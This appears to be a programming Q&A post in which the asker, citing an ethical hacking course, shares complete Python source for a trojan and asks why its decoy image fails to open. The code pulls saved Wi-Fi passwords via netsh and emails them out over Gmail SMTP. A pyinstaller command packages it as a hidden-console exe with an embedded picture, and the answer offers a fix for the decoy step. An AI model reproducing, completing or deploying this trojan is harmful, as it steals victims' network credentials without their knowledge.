# Cannot Open a File with Subprocess.Popen()

Tags: python, windows, subprocess, pyinstaller, trojan

I am trying to create a Python 3 based Trojan for my Ethical Hacking Course at https://phoenyxacademy.com. So it is a basic Trojan that will open a picture on the surface but will extract and send wifi password to an e-mail. But after packaging the python script with pyinstaller and running the generated exe, I get an error.

[Error Generated](https://i.stack.imgur.com/OtAYf.png)

The Python Source Code:

```
#!/usr/bin/env python3

# A program to steal wifi passwords and send to our e-mail


# import modules
import subprocess
import re
import smtplib
import sys
import tempfile


def retrieve_wifi_passwords():
    system_command = 'netsh wlan show profile'
    access_points = subprocess.check_output(system_command, shell=True, stderr=subprocess.DEVNULL, stdin=subprocess.DEVNULL)
    access_point_list = re.findall("(?:Profile\s*:\s)(.*)", access_points.decode()) 
    
    profile_result = ""
    for access_point in access_point_list:
        system_command = 'netsh wlan show profile "' + access_point + '" key=clear'
        result = subprocess.check_output(system_command, shell=True)
        result = result.decode()
        profile_result += result
    
    return profile_result   


def send_mail(email, password, message):
    server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
    server.login(email, password)
    server.sendmail(email, email, message)
    server.quit()

# to run after embedding it with a file
temp_directory = tempfile.gettempdir()

file_name = "C:\\Users\\Faisal Gama\\AppData\\Local\\Temp\\car.jpg"
subprocess.Popen(file_name, shell=True)

email = 'my_email'
password = 'my_password'
profile_result = retrieve_wifi_passwords()
send_mail(email, password, profile_result)
```

I use the pyinstaller command:

```
pyinstaller wifi_malware.py --onefile --noconsole --add-data "C:\Users\Faisal Gama\Downloads\car.jpg;C:\Users\Faisal Gama\AppData\Local\Temp"
```

Answer (score 0):

You can use cmd exe to do such a job. Just try

```
subprocess.Popen(["cmd", "/C", "start " + file_name], shell=True)
```

Comment: if you want windows to show your image with the default application, you need what i show you in the answer. but the problem you are having is different. check that link. https://stackoverflow.com/a/42170011/2016727